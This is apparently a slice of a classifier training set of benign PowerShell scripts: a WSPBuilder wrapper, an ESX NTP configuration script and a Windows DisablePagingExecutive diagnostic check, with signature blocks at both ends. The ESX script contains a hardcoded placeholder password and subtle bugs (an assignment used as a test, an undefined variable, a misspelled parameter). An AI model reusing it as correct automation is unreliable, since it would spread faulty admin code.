MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAI3quFKH0FCCVw9rzHznTSR # Pkzyc6mYvXVxtCI7Nrk1MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAPGBLUNBERSJGuOvYfDG1/AiVDj1w48utpmQvHd91xFP0Rp+0lsaXh2zZ # 3uCVl7yZ2gPqsO1JoXrBAhAbcLgC4B4RdbgarAYli6yzEfRhMWpDpEPpiIyKQTyr # I9kM5T1xw4EVsT/MoDd1gmAJOpB8Kwg4UiicLmiT32Y6Z8MwZHqc7lgBBg7RvFOz # 1KstHpkKYlkRLu8PcMmXwiYzjPzoewDKPjYtX85XTP6AAS4zWB9Yis8l9x4xJulh # HcpoRNGj9jSN4U3h8fmq9nCsmngPCnzQ7ZP/2rfUCYJ16ZpCvpfD2A1Tqjo0sPsX # EoAE9MqAgvCs1GHohtAvjyXjDQ5siaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCC/+WKQhEGBV6Ap0lM+xC+2gWDeMVPjLrbX8I0LPoP9PQIGZjOtMlBK # GBMyMDI0MDUxNjA2NDIxMy44OTVaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpEMDgyLTRC # RkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvIsyA1sjg9kSKJzelrUWF5 # ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0RaGrU8EHydF8NxPMR2KVNi # AtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYniwKLPQLJ00EkXw5TSwfm # JXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdFLKwo4BTlEgnvzeTfXukz # X8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8XlBQDVDX5JeMEsx7jgJDdE # nK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7rSFvcLnwAqMdqcy/iqQP # MlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg8oWwXyiv3+bGB6dmdM61 # ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/DbUSqW2RqTUa2O2KuvsyRG # MEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+fdTw+geRn6Mo2S6+/bZEw # S/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGVPRqkmz5UYz+R5ybMJWj+ # mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0phjUTH2GChHIvE4SDSk2hw # WP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU6HPSBd0OfEX3 # uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANnrb8Ewr8eX/H1s # Kt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g6Tf7tNx1q0NpKk1JTupU # JfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXTMzxiewfErVLt8Wefebnc # ST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz/zEA1AbZL/viXtHmryA0 # CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+dh+UsFi0d4lkdcE+Zq5JN # jIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YWzhP/5XQnYl03AfXErn+1 # Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1qy4y4vlVKaShtbdfgPyG # eeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3hsHzG8n5u5CQajPwx9Pzp # sZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4QwGf5B71x57OjaX53gxT4 # vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ062nyIZKnsXxzuKFb0TjXW # w6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0bSrAlVeihcaG5F74SZT8 # FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpE # MDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJfSbL3djnQEqaggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnv9qkwIhgPMjAyNDA1MTYxMTA2MTdaGA8yMDI0MDUxNzExMDYxN1owdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6e/2qQIBADAHAgEAAgIOHDAHAgEAAgISLDAKAgUA # 6fFIKQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAErLMvBkHb4KezZvNtsk # 484+j510LWTKQwXtcK8L8YqA0+wlWlY7QubH2hmdTAmD/ECPcxbNI1pTKKJ4hlXU # U56grdz+Bh5jaW5Z6Xh0chi9pHJ7x1cNFeF0Ldzlvj4DxBkInT30K6T+mEyrcU3r # 8/mf0Pmg3tX/NXqVmouWStmRMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQg4sQVfmvs+MiGDadhf8rIeeU3yMiB2yxl8WJtZ1OsADswgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0Ou0IqxELDhX2TLylxIIN # NzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3MHg # jMJfWF6OAAEAAAHcMCIEIMTvbH6kIHUreuUD/Hq60uvVE0Mtqj5sSIGrAkEVk1NF # MA0GCSqGSIb3DQEBCwUABIICABFjb8CAUDUk17L1ZLykdgfN8pbmFNKkm8+I2x6v # 4sh0K+y+46DbpkCFQRflAIWOoA0yPmm6k95D3FJZqkTgNZCYokVZrG4JWg4nRHjx # uq18oQ89i4HQ7o/RkJ0I4ZhvCo13SpPL51lrjXyLqZViYKZGsSZUSGCGi5c+1a2T # RF6NeEvPT+HKUqwER3cMnRKvH1CzvWOdoE9f/4LXSztRatSpqqwWSEOJE1TiYMdd # z/1gpe1vG9k3zTI7nr7BkOPKc5+EiRbEMmLOWw+vIO/VcQrqoy+iS66aERR/7So8 # /rT2DpaILngNGtzn+otIkMLoU9rkigpFQVgGy6PrZDIGsqKxVw5deT8QZj/lRhTH # 9sy4710sMLLQWdsSaCH1Ws3+/sSzIcWt+PUEEmWK4n2Jv8c3RSwKXTPR5phlz31A # gBgeOXkq/TCb7yY4NngpmCoU5gIJfNmtsN8NezWSscSoar+TViIBqDaCIFYylECx # 26Q1WFxvBAfAuKHxlo8tWCCZTrnR2kMk0Og3LlXEh0k/zeVvU+eodEIapky01szg # MtyVMXGnN0txwNK+Luc2zwxprbcnyjelLIH2RNjX1UX2pzfXmJgd0GvTaOGl4ZRz # hbO/JU1BY2/RvtRF+UaeMOfne3EET0xH9iZtwDqIRU3ao3JP0Kbx4nHcVkR40xkN # QK2v # SIG # End signature block
combined_dataset/train/non-malicious/Call WSPBuilder.ps1
Call WSPBuilder.ps1
function Run-DosCommand($program, [string[]]$programArgs) { write-host "Running command: $program"; write-host " Args:" 0..($programArgs.Count-1) | foreach { Write-Host " $($programArgs[$_])" } & $program $programArgs } #Get-FullPath function defined elsewhere, refers to a "base directory" which allows me to make #all path references RELATIVE to this base directory. Feel free to hardcode the path instead. $wspbuilder = Get-FullPath("tools\\WSPBuilder.exe") function Run-WspBuilder($rootDirectory) { pushd cd $rootDirectory Run-DosCommand -program $WSPBuilder -programArgs @("-BuildWSP", "true", "-OutputPath", (Get-FullPath 'deployment'), "-ExcludePaths", (Join-Path -path (Get-FirstDirectoryUnderneathSrc).fullname -childPath "bin\\Debug")) popd }
combined_dataset/train/non-malicious/ESX host NTP Settings.ps1
ESX host NTP Settings.ps1
<#====================================================================================== File Name : ESX-NTP.ps1 Original Author : Kenneth C. Mazie : Description : This is a VMware PowerCLI script for synchronizing NTP settings across : all ESX hosts in a Virtual Center instance. It grabs all ESX hosts and : cycles through them setting the same NTP settings on each. It then : starts the service and sets it to start automatically. : : The individual commands were found on a blog post from Anders Mikkelson. : I simply combined them into a functioning script so credit goes to him. : See http://www.amikkelsen.com/?p=458 for the original posting. : : Tested on ESXi 5.1 and 5.0 : : Be sure to edit all sections to suit your needs before executing. : : As written the script will prompt for a Virtual Center instance to process : and a user/password to connect as. It also prompts for the ESX host user ID. : Hard code these if the prompts become annoying. : Notes : Requires VMware PowerShell PowerCLI extentions. : Warnings : : : Last Update by : Kenneth C. Mazie (kcmjr AT kcmjr.com to report issues) Version History : v1.0 - 03-13-12 - Original Change History : v2.0 - 00-00-00 - : =======================================================================================#> clear-host $out = Get-PSSnapin | Where-Object {$_.Name -like "vmware.vimautomation.core"};if ($out -eq $null) {Add-PSSnapin vmware.vimautomation.core} Disconnect-VIServer -confim:$false $vSphere = read-host "Process Which vSphere Instance?" $vUser = read-host "vSphere User ID?" $vPass = "" $eUser = read-host "ESX User ID?" $ePass = "password" $NTPServers = ("time.nist.gov","time-nw.nist.gov","us.pool.ntp.org") #--[ Change these to whatever NTP servers you use ]-- if ($vSphere = $null){break} Connect-VIServer -Server $vSphere -User $vUser #-Password $vPass $ESXhosts = get-vmhost foreach ($ESX in $ESXHosts) { Write-Host "Target = $ESX" Connect-VIServer -Server $ESX -User $eUser #-Password $ePass $NTPList = Get-VMHostNtpServer -VMHost $ESX Remove-VMHostNtpServer -VMHost $ESX -NtpServer $NTPList -Confirm:$false Add-VMHostNtpServer -VMHost $ESX -NtpServer $NTPServers -Confirm:$false Set-VMHostService -HostService (Get-VMHostservice -VMHost (Get-VMHost $ESXhost) | Where-Object {$_.key -eq "ntpd"}) -Policy "Automatic" Get-VmhostFirewallException -VMHost $ESX -Name "NTP Client" | Set-VMHostFirewallException -enabled:$true $ntpd = Get-VMHostService -VMHost $ESX | where {$_.Key -eq 'ntpd'} Restart-VMHostService $ntpd -Confirm:$false Disconnect-viserver -server $ESX -confim:$false } Write-Host "--- COMPLETED ---"
combined_dataset/train/non-malicious/sample_8_93.ps1
sample_8_93.ps1
#************************************************ # TS_DisablePagingExecutiveCheck.ps1 # Version 1.0.1 # Date: 7/16/2013 # Author: v-maam # Description: [Idea ID 8012] [Windows] SDP-UDE check for reg key DisablePagingExecutive # Rule number: a0827633-6742-40cf-be40-e6de772a4e2f # Rule URL: https://kse.microsoft.com/Contribute/Idea/034ceb38-ffda-4611-abb2-81ca16f231e0 #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Display-DefaultActivity -Rule -RuleNumber a0827633-6742-40cf-be40-e6de772a4e2f $RootCauseDetected = $false $RootCauseName = "RC_DisablePagingExecutiveCheck" $InformationCollected = new-object PSObject # ************** # Detection Logic # ************** $MemoryManagementRegKey = "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" if(Test-Path $MemoryManagementRegKey) { $DisablePagingExecutiveSetting = (Get-ItemProperty $MemoryManagementRegKey).DisablePagingExecutive if ($DisablePagingExecutiveSetting -eq 1) { $RootCauseDetected = $true #Add information to InformationCollected $InformationCollected | add-member -membertype noteproperty -name "Current DisablePagingExecutive Value" -value $DisablePagingExecutiveSetting $InformationCollected | add-member -membertype noteproperty -name "Expected DisablePagingExecutive Value" -value 0 } } # ********************* # Root Cause processing # ********************* if ($RootCauseDetected) { # Red/ Yellow Light Update-DiagRootCause -id $RootCauseName -Detected $true Add-GenericMessage -Id $RootCauseName -InformationCollected $InformationCollected } else { # Green Light Update-DiagRootCause -id $RootCauseName -Detected $false } # SIG # Begin signature block # MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCt41HjxWboInxM # QaBEJ7YHch6GazDEoT+FrK0be8sf+6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # 